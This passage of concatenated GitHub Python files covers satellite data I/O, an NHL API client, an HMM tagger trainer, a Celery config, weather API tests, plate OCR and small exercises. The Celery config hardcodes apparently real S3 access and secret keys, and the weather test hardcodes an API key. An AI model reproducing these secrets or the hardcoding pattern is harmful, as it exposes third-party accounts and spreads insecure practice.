h5file.keys():\n h5_groups.append(h5file['/dardar'])\n data_objects.append(retv.dardar)\n if 'iss' in h5file.keys():\n h5_groups.append(h5file['/iss'])\n data_objects.append(retv.iss)\n if 'amsr' in h5file.keys():\n h5_groups.append(h5file['/amsr'])\n data_objects.append(retv.amsr)\n if 'mora' in h5file.keys():\n h5_groups.append(h5file['/mora'])\n data_objects.append(retv.mora)\n if 'synop' in h5file.keys():\n h5_groups.append(h5file['/synop'])\n data_objects.append(retv.synop)\n if 'cmaprob_cots' in h5file:\n h5_groups.append(h5file['/cmaprob_cots'])\n data_objects.append(retv.extra)\n if 'extra' in h5file:\n h5_groups.append(h5file['/extra'])\n data_objects.append(retv.extra)\n return (h5_groups, data_objects)\n\n\ndef read_truth_imager_match_obj(filename, truth='calipso',\n read_all=True,\n read_var=[],\n skip_var=[]):\n retv = TruthImagerTrackObject(truth=truth)\n h5file = h5py.File(filename, 'r')\n (h5_groups, data_objects) = get_stuff_to_read_from_a_reshaped_file(h5file, retv)\n for group, data_obj in zip(h5_groups, data_objects):\n imager_instrument = group.attrs.get(\"imager_instrument\", None)\n if imager_instrument is not None:\n retv.imager_instrument = imager_instrument \n for dataset in group.keys():\n if dataset in skip_var:\n continue\n if (read_all or dataset in read_var or\n (len(read_var) == 0 and dataset.data_obj.all_arrays.keys())):\n atrain_match_name = dataset\n if atrain_match_name in [\"snow_ice_surface_type\"]:\n atrain_match_name = \"nsidc_surface_type\"\n setattr(data_obj, atrain_match_name, group[dataset][...])\n retv.diff_sec_1970 = h5file['diff_sec_1970'][...]\n h5file.close()\n return retv\n\n\ndef read_files(files, truth='calipso', read_all=True, read_var=[], skip_var=[]):\n my_files = files.copy()\n tObj = read_truth_imager_match_obj(my_files.pop(), truth=truth, read_all=read_all, read_var=read_var, skip_var=skip_var)\n if len(my_files) > 0:\n for filename in my_files:\n tObj += read_truth_imager_match_obj(filename, truth=truth, read_all=read_all, read_var=read_var, skip_var=skip_var)\n return tObj\n\n\n# write matchup files\n\n\ndef write_truth_imager_match_obj(filename, match_obj, SETTINGS=None, imager_obj_name='pps'):\n \"\"\"Write *match_obj* to *filename*.\"\"\"\n datasets = {'diff_sec_1970': match_obj.diff_sec_1970}\n groups = {imager_obj_name: match_obj.imager.all_arrays}\n imager_attrs = {'imager_instrument': match_obj.imager_instrument}\n groups_attrs = {imager_obj_name: imager_attrs}\n for name in ['calipso', 'calipso_aerosol', 'iss', 'modis_lvl2', 'dardar',\n 'amsr', 'synop', 'mora', 'cloudsat', 'extra']:\n if hasattr(match_obj, name):\n groups[name] = getattr(match_obj, name).all_arrays\n write_match_objects(filename, datasets, groups, groups_attrs, SETTINGS=SETTINGS)\n return 1\n\n\ndef sliding_std(x, size=5):\n \"\"\"derive a sliding standard deviation of a data array\"\"\"\n from scipy.ndimage.filters import uniform_filter\n c1 = uniform_filter(x.astype('float'), size=size)\n c2 = uniform_filter(x.astype('float')*x.astype('float'), size=size)\n return abs(c2 - c1 * c1)**.5\n\n\nthe_used_variables = [\n 'longitude',\n 'latitude',\n 'sec_1970',\n 'imager_linnum',\n 'imager_pixnum',\n 'imager_linnum_nneigh',\n 'imager_pixnum_nneigh',\n 'sec_1970',\n 'elevation',\n # MODIS LVL2\n 'height',\n 'temperature',\n 'pressure',\n 'cloud_emissivity',\n 'cloud_phase',\n 'lwp',\n # AMSR\n 'lwp',\n 'imager_amsr_dist',\n 'pixel_status',\n 'quality',\n 'surface_type',\n # MORA\n 'cloud_base_height',\n # Cloudsat\n 'cloud_fraction',\n 'validation_height',\n 'LO_RVOD_liquid_water_path',\n 'IO_RVOD_ice_water_path',\n 'LO_RO_liquid_water_path',\n 'IO_RO_ice_water_path',\n 'RVOD_liq_water_path', # g/m2 R04\n 'RVOD_ice_water_path', # g/m2 R04\n 'RO_liq_water_path', # g/m2 R05\n 'RO_ice_water_path', # g/m2 R05\n 'precip_liq_water_path_gm2', # g/m2\n 'cloud_liq_water_path_gm2', # g/m2 \n 'precip_ice_water_path_gm2', # g/m2 \n 'cloud_ice_water_path_gm2', # g/m2\n 'liq_water_path_gm2', # g/m2\n 'ice_water_path_gm2', # g/m2\n 'precip_liq_water_path', # kg/m2 R05\n 'cloud_liq_water_path', # kg/m2 R05\n 'precip_ice_water_path', # kg/m2 R05\n 'cloud_ice_water_path', # kg/m2 R05\n 'liq_water_path', # kg/m2 R05\n 'ice_water_path', # kg/m2 R05\n #'ice_water_content',\n #'liq_water_content',\n \"RVOD_CWC_status\",\n # CALIPSO write do not combine\n 'cal_modis_cflag',\n 'cloudsat_index',\n\n # DARDAR\n #'height',\n #'Z',\n 'bscat',\n 'bscat_perp',\n 'instrument_flag',\n 'iwc',\n 'Target_Lidar_Mask',\n 'effective_radius',\n 'N0star',\n 'temperature',\n 'day_night_flag',\n 'land_water_mask',\n 'tropopause_height',\n 'DARMASK_Simplified_Categorization',\n\n # CALIPSO only (ISS?)\n 'minimum_laser_energy_532',\n 'cad_score',\n \"average_cloud_top_pressure_single_shots\",\n \"average_cloud_top_pressure_single_shots_1km\",\n \"average_cloud_top_single_shots\",\n \"average_cloud_top_single_shots_1km\",\n 'profile_id',\n 'layer_top_altitude',\n 'layer_top_altitude_fore_fov',\n 'layer_top_temperature',\n 'layer_top_pressure',\n 'layer_base_altitude',\n 'layer_base_pressure',\n 'midlayer_temperature',\n 'number_layers_found',\n 'igbp_surface_type',\n 'nsidc_surface_type',\n 'snow_ice_surface_type',\n 'surface_type_fore_fov',\n 'feature_classification_flags',\n 'feature_optical_depth_532',\n 'single_shot_data',\n 'cfc_single_shots_1km_from_5km_file',\n 'feature_optical_depth_532_top_layer_5km',\n 'feature_optical_depth_532_5km',\n 'total_optical_depth_5km',\n 'detection_height_5km',\n 'column_optical_depth_cloud_532',\n 'column_optical_depth_cloud_uncertainty_532',\n 'column_optical_depth_tropospheric_aerosols_532_5km',\n 'column_optical_depth_tropospheric_aerosols_532',\n 'column_optical_depth_aerosols_532_5km',\n 'column_optical_depth_aerosols_532',\n \"layer_top_altitude_5km\",\n \"layer_top_pressure_5km\",\n 'number_cloudy_single_shots',\n \"average_cloud_base_single_shots_5km\",\n \"average_cloud_top_pressure_single_shots_5km\",\n \"average_cloud_top_single_shots_5km\",\n # CLOUDSAT only\n 'clsat_max_height',\n 'validation_height_base',\n 'MODIS_Cloud_Fraction',\n 'MODIS_cloud_flag',\n 'calipso_layer_base_altitude',\n 'calipso_layer_top_altitude',\n 'calipso_feature_classification_flags']\n# ----------------------------------------\nif __name__ == \"__main__\":\n\n import os.path\n TESTDIR = (\"/local_disk/laptop/NowcastingSaf/FA/cloud_week_2013may\" +\n \"/atrain_matchdata/2012/10/arctic_europe_1km\")\n TESTFILE = os.path.join(TESTDIR,\n \"1km_npp_20121012_1246_04968_caliop_viirs_match.h5\")\n TESTFILE2 = os.path.join(TESTDIR,\n \"1km_npp_20121004_0700_04851_caliop_viirs_match.h5\")\n match_calipso = read_truth_imager_match_obj(TESTFILE)\n match_calipso2 = read_truth_imager_match_obj(TESTFILE2)\n\n match_calipso = match_calipso + match_calipso2\n","repo_name":"foua-pps/atrain_match","sub_path":"atrain_match/matchobject_io.py","file_name":"matchobject_io.py","file_ext":"py","file_size_in_byte":25648,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"27"} +{"seq_id":"14637248256","text":"#~/usr/bin/env python3\nimport requests\nimport pandas\nimport json\nfrom colorama import Fore,Style,init\ninit()\n\n# GLOBAL\nAPI = \"https://statsapi.web.nhl.com/api/v1/teams\"\n\ndef main():\n # call the webservice\n res = requests.get(API)\n # print the response json\n print(res.json())\n\n # display names of teams\n print(f\"\\n{Fore.GREEN}{Style.BRIGHT}Team Names::\")\n teams = res.json().get(\"teams\")\n count = 1\n for team in teams:\n print(f\"{Fore.GREEN}{Style.BRIGHT}Team {count}. \")\n print(f\"\\t{Style.BRIGHT}{Fore.WHITE}Name: {Style.NORMAL}{team.get('name')}\")\n print(f\"\\t{Style.BRIGHT}Abbreviation: {Style.NORMAL}{team.get('abbreviation')}\")\n print(f\"\\t{Style.BRIGHT}Team Name: {Style.NORMAL}{team.get('teamName')}\")\n print(f\"\\t{Style.BRIGHT}Location Name: {Style.NORMAL}{team.get('locationName')}\")\n print(f\"\\t{Style.BRIGHT}First Year of Play: {Style.NORMAL}{team.get('firstYearOfPlay')}\")\n print(f\"\\t{Style.BRIGHT}Official Site URL: {Style.NORMAL}{team.get('officialSiteUrl')}\")\n print(f\"\\t{Style.BRIGHT}Active: {Style.NORMAL}{team.get('active')}\")\n count += 1\n\n itemsdf = pandas.DataFrame(teams)\n itemsdf.to_excel(\"teams.xlsx\")\n itemsdf.to_csv(\"teams.csv\")\n itemsdf.to_json(\"teams.json\", orient='records')\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"dhruti-kosta/PythonBasics","sub_path":"week2/tuesday/tuesday_morning.py","file_name":"tuesday_morning.py","file_ext":"py","file_size_in_byte":1339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"22895680169","text":"import argparse, sys, os, time, codecs, random\nimport MeCab\nimport bhmm\n\nclass stdout:\n\tBOLD = \"\\033[1m\"\n\tEND = \"\\033[0m\"\n\tCLEAR = \"\\033[2K\"\n\ndef printb(string):\n\tprint(stdout.BOLD + string + stdout.END)\n\ndef printr(string):\n\tsys.stdout.write(\"\\r\" + stdout.CLEAR)\n\tsys.stdout.write(string)\n\tsys.stdout.flush()\n\n# 訓練データを形態素解析して各品詞ごとにその品詞になりうる単語の総数を求めておく\ndef build_corpus(filename):\n\tcorpus = bhmm.corpus()\n\tsentence_list = []\n\twith codecs.open(filename, \"r\", \"utf-8\") as f:\n\t\tfor sentence_str in f:\n\t\t\tsentence_list.append(sentence_str)\n\trandom.shuffle(sentence_list)\t# データをシャッフル\n\ttrain_split = int(len(sentence_list) * args.train_split)\n\n\tword_count = set()\t# 単語の種類の総数\n\tpos_count = set()\t# 品詞数\n\tmajor_pos_count = set()\t# 品詞数(大分類)\n\tWt_count = {}\n\n\ttagger = MeCab.Tagger()\n\ttagger.parse(\"\")\n\tfor i, sentence_str in enumerate(sentence_list):\n\t\tsentence_str = sentence_str.strip()\n\t\tif i % 10 == 0:\n\t\t\tprintr(\"データを準備しています ... {}\".format(i + 1))\n\t\tm = tagger.parseToNode(sentence_str)\t# 形態素解析\n\t\twords = []\n\t\twhile m:\n\t\t\tword = m.surface\n\t\t\tfeatures = m.feature.split(\",\")\n\t\t\tpos_major = features[0]\n\t\t\tpos = (pos_major + \",\" + features[1])\n\t\t\tmajor_pos_count.add(pos_major)\n\t\t\tpos_count.add(pos)\n\t\t\tif pos == \"名詞,数\":\n\t\t\t\tword = \"##\"\t\t# 数字は全て置き換える\n\t\t\twords.append(word)\n\t\t\tword_count.add(word)\n\t\t\tif pos_major not in Wt_count:\n\t\t\t\tWt_count[pos_major] = {}\n\t\t\tif word not in Wt_count[pos_major]:\n\t\t\t\tWt_count[pos_major][word] = 1\n\t\t\telse:\n\t\t\t\tWt_count[pos_major][word] += 1\n\t\t\tm = m.next\n\n\t\tif len(words) == 0:\n\t\t\tcontinue\n\n\t\t# データを追加\n\t\tcorpus.add_words(words)\n\n\tif args.supervised:\n\t\t# Wtは各品詞について、その品詞になりうる単語の数が入っている\n\t\tWt = [len(words) for tag, words in Wt_count.items()]\n\telse:\n\t\t# Wtに制限をかけない場合\n\t\tWt = [int(len(word_count) / args.num_tags)] * args.num_tags\n\n\treturn corpus, Wt\n\ndef main():\n\tassert args.train_filename is not None\n\ttry:\n\t\tos.mkdir(args.working_directory)\n\texcept:\n\t\tpass\n\n\t# 訓練データを追加\n\tcorpus, Wt = build_corpus(args.train_filename)\n\tdataset = bhmm.dataset(corpus, args.train_split, args.unknown_threshold)\t# 低頻度語を全てに置き換える\n\n\t# 単語辞書を保存\n\tdictionary = dataset.get_dict()\n\tdictionary.save(os.path.join(args.working_directory, \"bhmm.dict\"))\n\n\t# モデル\n\tnum_tags = len(Wt) if args.supervised else args.num_tags\n\tmodel = bhmm.model(num_tags, dataset, Wt)\n\n\t# ハイパーパラメータの設定\n\tmodel.set_temperature(args.start_temperature)\t\t# 温度の初期設定\n\tmodel.set_minimum_temperature(args.min_temperature)\t# 温度の下限\n\tmodel.set_initial_alpha(args.initial_alpha)\n\tmodel.set_initial_beta(args.initial_beta)\n\n\t# 学習の準備\n\ttrainer = bhmm.trainer(dataset, model)\n\n\t# 学習ループ\n\tdecay = (args.start_temperature - args.min_temperature) / args.epochs \n\tfor epoch in range(1, args.epochs + 1):\n\t\tstart = time.time()\n\t\ttrainer.gibbs()\t# 新しい状態系列をギブスサンプリング\n\t\ttrainer.anneal_temperature(decay)\t# 温度を下げる\n\n\t\t# ログ\n\t\telapsed_time = time.time() - start\n\t\tprintr(\"Iteration {} / {} - temp {:.3f} - {:.3f} sec\".format(epoch, args.epochs, model.get_temperature(), elapsed_time))\n\t\tif epoch % 1000 == 0:\n\t\t\tprintr(\"\")\n\t\t\tmodel.print_typical_words_assigned_to_each_tag(20, dictionary)\n\t\tif epoch % 100 == 0:\n\t\t\tprintr(\"ハイパーパラメータのサンプリング ...\")\n\t\t\ttrainer.update_hyperparameters()\t# ハイパーパラメータをサンプリング\n\t\t\tprintr(\"\")\n\t\t\tprint(\"log_likelihood: train {} - dev {}\".format(trainer.compute_log_p_dataset_train(), trainer.compute_log_p_dataset_dev()))\n\t\t\tmodel.save(os.path.join(args.working_directory, \"bhmm.model\"))\n\nif __name__ == \"__main__\":\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument(\"-file\", \"--train-filename\", type=str, default=None, help=\"訓練用のテキストファイルのパス..\")\n\tparser.add_argument(\"-epochs\", \"--epochs\", type=int, default=100000, help=\"総epoch.\")\n\tparser.add_argument(\"-cwd\", \"--working-directory\", type=str, default=\"out\", help=\"ワーキングディレクトリ.\")\n\tparser.add_argument(\"--supervised\", dest=\"supervised\", default=False, action=\"store_true\", help=\"各タグのWtを訓練データで制限するかどうか.指定した場合num_tagsは無視される.\")\n\tparser.add_argument(\"--unsupervised\", dest=\"supervised\", action=\"store_false\", help=\"各タグのWtを訓練データで制限するかどうか.\")\n\tparser.add_argument(\"-tags\", \"--num-tags\", type=int, default=20, help=\"タグの種類(semi_supervisedがFalseの時のみ有効).\")\n\tparser.add_argument(\"-unk\", \"--unknown-threshold\", type=int, default=1, help=\"出現回数がこの値以下の単語はに置き換える.\")\n\tparser.add_argument(\"-split\", \"--train-split\", type=float, default=0.9, help=\"テキストデータの何割を訓練データにするか.\")\n\tparser.add_argument(\"--start-temperature\", type=float, default=1.5, help=\"開始温度.\")\n\tparser.add_argument(\"--min-temperature\", type=float, default=0.08, help=\"最小温度.\")\n\tparser.add_argument(\"--initial-alpha\", \"-alpha\", type=float, default=0.003, help=\"alphaの初期値.\")\n\tparser.add_argument(\"--initial-beta\", \"-beta\", type=float, default=1.0, help=\"betaの初期値.\")\n\targs = parser.parse_args()\n\tmain()","repo_name":"musyoku/unsupervised-pos-tagging","sub_path":"bayesian-hmm/run/train_ja.py","file_name":"train_ja.py","file_ext":"py","file_size_in_byte":5484,"program_lang":"python","lang":"ja","doc_type":"code","stars":16,"dataset":"github-code","pt":"27"} +{"seq_id":"4981366744","text":"import os\nfrom typing import get_type_hints, Union\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\nclass CeleryConfigError(Exception):\n \"\"\"Exception raised for errors in celery environment variables.\"\"\"\n\n pass\n\ndef _parse_bool(val: Union[str, bool]) -> bool: \n\n \"\"\" convert values of other data types to bool type\n\n Args:\n val (Union[str, bool]): input environment variable\n\n Returns:\n bool: actual Boolean\n \"\"\"\n\n return val if type(val) == bool else val.lower() in ['true', 'yes', '1']\n\n# CeleryConfig class with required fields, default values, type checking, and typecasting for int and bool values\nclass CeleryConfig:\n \n DEBUG: bool = False\n # RABBITMQ\n RABBITMQ_HOST: str = 'rabbitmq'\n RABBITMQ_USERNAME: str = 'guest'\n RABBITMQ_PASSWORD: str = 'guest'\n RABBITMQ_PORT: int = 5672\n # REDIS\n REDIS_HOST: str = 'redis'\n REDIS_PORT: int = 6379\n REDIS_CELERY_DB_INDEX: int = 0\n REDIS_STORE_DB_INDEX: int = 0\n # S3\n S3_ACCESS_KEY_ID: str = 'HFjem90Dh2jUNBMl'\n S3_SECRET_ACCESS_KEY: str = 'SjA547SKtxEiTf0S5g5JCo1hhLrsMSEE'\n S3_BUCKET: str = 'c888701'\n S3_ENDPOINT_URL: str = 'http://c888701.parspack.net'\n SHARED_VOLUME = '/tmp'\n\n \"\"\"\n Map environment variables to class fields according to these rules:\n - Field won't be parsed unless it has a type annotation\n - Field will be skipped if not in all caps\n - Class field and environment variable name are the same\n \"\"\"\n \n def __init__(self, env):\n\n \"\"\" type checking, and typecasting \n\n Raises:\n CeleryConfigError: if required field not supplied\n CeleryConfigError: if required type not provided\n \"\"\" \n \n for field in self.__annotations__:\n if not field.isupper():\n continue\n\n # Raise CeleryConfigError if required field not supplied\n default_value = getattr(self, field, None)\n if default_value is None and env.get(field) is None:\n raise CeleryConfigError('The {} field is required'.format(field))\n\n # Cast env var value to expected type and raise CeleryConfigError on failure\n try:\n var_type = get_type_hints(CeleryConfig)[field]\n if var_type == bool:\n value = _parse_bool(env.get(field, default_value))\n else:\n value = var_type(env.get(field, default_value))\n\n self.__setattr__(field, value)\n except ValueError:\n raise CeleryConfigError('Unable to cast value of \"{}\" to type \"{}\" for \"{}\" field'.format(\n env[field],\n var_type,\n field\n )\n )\n\n def __repr__(self):\n return str(self.__dict__)\n\n# Expose Config object for app to import\nConfig = CeleryConfig(os.environ)\n","repo_name":"i1idan/fastapi-taskqueue","sub_path":"app/worker/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2913,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"27"} +{"seq_id":"33096985815","text":"import json\n\nimport requests\nfrom selenium import webdriver\nfrom webdriver_manager.chrome import ChromeDriverManager\n\nurl = \"https://api.openweathermap.org/data/2.5/weather\"\nmy_units = \"metric\"\nmy_api_key = \"ad48510a9aed1ff96b51557d94bc5964\"\ncity_name = \"Jerusalem\"\n\n\nclass Test_Open_Weather:\n def test_lolo(self):\n print(\"kuku\")\n\n def test_01(self):\n params = dict(q=city_name, units=my_units, appid=my_api_key)\n response = requests.get(url, params)\n print(response)\n print(json.dumps(response.json(), indent=2))\n\n def test_02(self):\n params = dict(q=city_name, units=my_units, appid=my_api_key)\n response = requests.get(url, params)\n result = response.json()\n print(json.dumps(result, indent=2))\n print(response.status_code)\n print(\"Content-Type: \", response.headers['Content-Type'])\n print(\"Date: \", response.headers['Date'])\n assert response.headers['Content-Type'] == 'application/json; charset=utf-8'\n assert response.status_code == 200\n\n def test_03(self):\n params = dict(q=city_name, units=my_units, appid=my_api_key)\n response = requests.get(url, params)\n print(json.dumps(response.json(), indent=2))\n res = response.json()\n assert res['sys']['country'] == 'IL'\n humidity = res['main']['humidity']\n print(humidity)\n\n def test_04(self):\n driver = webdriver.Chrome(ChromeDriverManager().install())\n driver.maximize_window()\n driver.get('https://openweathermap.org')\n driver.find_element_by_css_selector(\"input[placeholder='Weather in your city']\").send_keys(\"Jerusalem,IL\")\n\n","repo_name":"philco01/important_concepts.py","sub_path":"rest_api/test_eather_apy.py","file_name":"test_eather_apy.py","file_ext":"py","file_size_in_byte":1672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"41949727475","text":"numeros = [1, 2, 3, 4, 5, 6, 7, 8, 9]\n# feo\n# primero = numeros[0]\n# segundo = numeros[1]\n# tercero = numeros[2]\n\n# cada uno de los elementos de la lista de numeros se guarda en una variable separada\nprimero, segundo, tercero, *otros1 = numeros\n# a la variable de n1 se le otorga el valor del primer elemento de la lista\n# y los otros elementos se guardan en una nueva lista llamada otros\nn1, *otros, penu, ultio = numeros\n\nprint(primero, segundo, tercero)\nprint(n1, otros, ultio, penu)\n","repo_name":"zeox09/Workspace_university","sub_path":"tipos-avanzados/desempaquetar-listas.py","file_name":"desempaquetar-listas.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"28915881335","text":"\nimport os\nos.environ[\"KMP_DUPLICATE_LIB_OK\"]=\"TRUE\"\n\nimport imutils\nimport cv2 \nfrom matplotlib import pyplot as plt\nimport numpy as np\nimport easyocr\n\n\nimage = cv2.imread(\"image3.jpg\")\nwidth,height,channel = image.shape\ngray = cv2.cvtColor(image,cv2.COLOR_BGR2GRAY)\n\nfig = plt.figure(figsize=(10, 7))\n\n# setting values to rows and column variables\nrows = 2\ncolumns = 2\n\nfig.add_subplot(rows, columns, 1)\nplt.imshow(cv2.cvtColor(image,cv2.COLOR_BGR2RGB))\nplt.axis('on')\nplt.title(\"Normal\")\n\nfig.add_subplot(rows, columns, 2)\nplt.imshow(cv2.cvtColor(gray,cv2.COLOR_BGR2RGB))\nplt.axis('on')\nplt.title(\"Gray-Scale\")\n\n#Filter and edge detection\nfiltered = cv2.bilateralFilter(gray, 9, 75, 75)#noise reduction\nedged = cv2.Canny(filtered,30,200) #edge dectection\n\nfig.add_subplot(rows, columns, 3)\nplt.imshow(cv2.cvtColor(edged,cv2.COLOR_BGR2RGB))\nplt.axis('on')\nplt.title(\"Edged\")\n\n#Find contours\nkeypoints = cv2.findContours(edged.copy(), cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\ncontours = imutils.grab_contours(keypoints)\ncontours = sorted(contours,key=cv2.contourArea,reverse=True)[:5]\n\ncounter = 0\nlength = 0\ncX,cY,cW,cH = 0,0,0,0\ntext = \"\"\n\nfor contour in contours:\n approx = cv2.approxPolyDP(contour, 10, True)\n if len(approx) == 4:\n x,y,w,h =cv2.boundingRect(approx)\n cropped = gray[y:y+h,x:x+w]\n\n #EasyOCR\n reader = easyocr.Reader([\"tr\"])\n result = reader.readtext(cropped)\n\n if len(result) > 0 and len(result[0][1]) > length:\n counter = counter + 1\n length = len(result)\n print(result)\n text = result[0][1]\n cX,cY,cW,cH = x,y,w,h\n print(text)\n\nfont = cv2.FONT_HERSHEY_SIMPLEX\nfontScale = float(height)/600.0\nprint(text)\nprint(len(text))\n\nif counter == 0:\n cv2.putText(image,\"Plate Not Found\",(5,20),font,fontScale,(0,0,255),1,cv2.LINE_AA) \nelse:\n cv2.rectangle(image, (cX,cY),(cX+cW,cY+cH),(0,255,0),thickness=6)\n cv2.putText(image,text,(50,50),font,fontScale,(0,0,255),2,cv2.LINE_AA)\n\nfig.add_subplot(rows, columns, 4)\nplt.imshow(cv2.cvtColor(image,cv2.COLOR_BGR2RGB))\nplt.axis('on')\nplt.title(\"Result\")\nplt.show()\n\n\n\n\n\n\n\n\n ","repo_name":"Tahir98/NumberPlateRecognition","sub_path":"ANPR.py","file_name":"ANPR.py","file_ext":"py","file_size_in_byte":2158,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"71156527753","text":"from unittest import TestCase\nfrom day2 import step, Context, run_until\n\n\nclass Day2(TestCase):\n def test_step(self):\n c = Context(program=[1,4,5,6,1,2,0], ptr=0)\n c2 = step(c)\n self.assertEqual(3, c2.program[6])\n\n def test_given(self):\n c = Context(program=[1,0,0,0,99], ptr=0)\n c = run_until(c)\n self.assertEqual([2,0,0,0,99], c.program)\n\n c = Context(program=[2,3,0,3,99], ptr=0)\n c = run_until(c)\n self.assertEqual([2,3,0,6,99], c.program)\n\n c = Context(program=[2,4,4,5,99,0], ptr=0)\n c = run_until(c)\n self.assertEqual([2,4,4,5,99,9801], c.program)\n\n c = Context(program=[1,1,1,4,99,5,6,0,99], ptr=0)\n c = run_until(c)\n self.assertEqual([30,1,1,4,2,5,6,0,99], c.program)\n","repo_name":"fbouliane/adventofcode","sub_path":"2019/test_day2.py","file_name":"test_day2.py","file_ext":"py","file_size_in_byte":788,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"73944076872","text":"import math\r\nfrom tracemalloc import Statistic\r\nimport pandas as pd\r\nimport math\r\nimport statistics\r\n\r\ndata=[60,61,65,63,98,99,90,95,91,96]\r\n\r\nmean = statistics.mean(data)\r\n\r\nsquares = []\r\nfor i in data:\r\n a = (i-mean)**2\r\n squares.append(a)\r\n\r\nsum=0\r\nfor i in squares:\r\n sum=sum+i\r\n\r\nstdev=math.sqrt(sum/(len(data)-1))\r\nprint(stdev)\r\n\r\nprint(statistics.stdev(data))\r\n\r\n","repo_name":"DishaChhabra/Class-105","sub_path":"stdevpractice.py","file_name":"stdevpractice.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"42237382540","text":"import sys\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom scipy.spatial import distance as d\r\n\r\n\r\ndef printVals(KMap):\r\n print(\"Cluster Points\")\r\n for center in range(0, k):\r\n temp = pd.DataFrame(KMap[KMap.K == center][['x', 'y']])\r\n print(center, \" \", temp.index.values)\r\n\r\n\r\ndef calcuateSSE(k, KMap, centroids):\r\n SSElist = []\r\n for center in range(0, k):\r\n SSE = 0\r\n temp = pd.DataFrame(KMap[KMap.K == center][['x', 'y']])\r\n for index in temp.index.values:\r\n SSE += d.euclidean(temp.loc[[index]], centroids.loc[[center]]) ** 2\r\n SSElist.append(SSE)\r\n print(\"Value of Sum of Squared Error (SSE): \", sum(SSElist))\r\n\r\n\r\ndef main(k, inputpath, outputpath):\r\n # inputpath = \"C:/Users/ather/Desktop/data.csv\"\r\n # outputpath = \"C:/Users/ather/Desktop/results.txt\"\r\n data = pd.read_csv(inputpath, delimiter=\"\\t\", index_col='id')\r\n\r\n centroids = pd.DataFrame(np.random.uniform(low=0.3, high=0.9, size=(k, 2)))\r\n centroids.columns = ['x', 'y']\r\n\r\n plt.scatter(data['x'], data['y'])\r\n plt.scatter(centroids['x'], centroids['y'], marker=\"o\")\r\n for loops in range(1, 25):\r\n i = 0\r\n kloc = []\r\n temploc = 0\r\n\r\n # for points in data:\r\n for j in range(0, 100):\r\n locdist = []\r\n loc = 1\r\n for c in range(0, k):\r\n reldist = d.euclidean(data.loc[[j]], centroids.loc[[c]])\r\n locdist.append(reldist)\r\n if loc > reldist:\r\n loc = reldist\r\n temploc = i\r\n i = i + 1\r\n kloc.append(temploc)\r\n i = 0\r\n\r\n K = pd.DataFrame({'K': kloc})\r\n\r\n KMap = pd.concat([K, data], axis=1)\r\n\r\n meanlist = pd.DataFrame()\r\n\r\n for i in range(0, k):\r\n meanlist = meanlist.append(KMap[KMap.K == i][['x', 'y']].mean(0), ignore_index=True)\r\n meanlist = meanlist.fillna(0.3)\r\n if meanlist.equals(centroids):\r\n # print(loops, \"Exiting\")\r\n break\r\n centroids = meanlist\r\n\r\n printVals(KMap)\r\n calcuateSSE(k, KMap, centroids)\r\n plt.scatter(centroids['x'], centroids['y'], s=50, marker=\"x\", c='r')\r\n\r\n plt.show()\r\n\r\n\r\nk = int(sys.argv[1])\r\ninputpath = sys.argv[2]\r\noutputpath = sys.argv[3]\r\nfile = open(outputpath, \"w+\")\r\nsys.stdout = file\r\nmain(k, inputpath, outputpath)\r\nfile.close()\r\n","repo_name":"qifanyyy/JupyterNotebook","sub_path":"new_algs/Number+theoretic+algorithms/Euclidean+algorithm/kmeans.py","file_name":"kmeans.py","file_ext":"py","file_size_in_byte":2441,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"27"} +{"seq_id":"72878523911","text":"import pandas as pd\nimport numpy as np\n\n\nfavorite_number = 4\nfavorite_color = 'green'\ndays_of_the_week = ['Sunday, Monday, Tuesday, Wednesday, Thursday, Friday, Saturday']\npatient = {'ID': 14673317, 'Name': {'First Name': 'Sean', 'Last Name': 'OSullivan'}, 'Allergies': ['Pollen', 'Peanuts']}\n\n\nprint(favorite_number)\nprint(favorite_color)\nprint(days_of_the_week)\nprint(patient)\n\n\ndef drink_legally(name, age):\n if age < 21:\n results = name + ' cannot legally drink.'\n else:\n results = name + ' can legally drink.'\n return results\n\nlegal_drink_result = drink_legally('Sean', 21)\n\nprint('Can this person drink?: ' + legal_drink_result)\n\n\n\n\n ","repo_name":"sosullivan7221/health_analytics","sub_path":"health_analysis.py","file_name":"health_analysis.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"30594236710","text":"def factorial():\r\n \r\n \r\n n=int(input(\"Enter the value of n:\\n\"))\r\n fact=1\r\n for i in range(1,n+1):\r\n fact=fact*i\r\n print(f\"factorial of a given {n} is {fact}\")\r\n#if __name__==\"__main_\":\r\nfactorial()\r\n","repo_name":"Hari772/python_programs","sub_path":"factotial.py","file_name":"factotial.py","file_ext":"py","file_size_in_byte":225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"7371924197","text":"#!/usr/bin/python3\nfrom lib.ASAI_Predict import predict_images\nimport glob\nfrom lib.PipeUtil import load_json_file,save_json_file, mfd_roi\nimport os\nimport sys\nimport cv2\n# SCRIPT TO BATCH BUILD ALL ROI FILES AND POPULATE\n# THE LEARNING REPO FOR METEORS\n\n\ndef get_mfiles(mdir):\n temp = glob.glob(mdir + \"/*.json\")\n mfiles = []\n for json_file in temp:\n if \"cloud\" not in json_file and \"import\" not in json_file and \"report\" not in json_file and \"reduced\" not in json_file and \"calparams\" not in json_file and 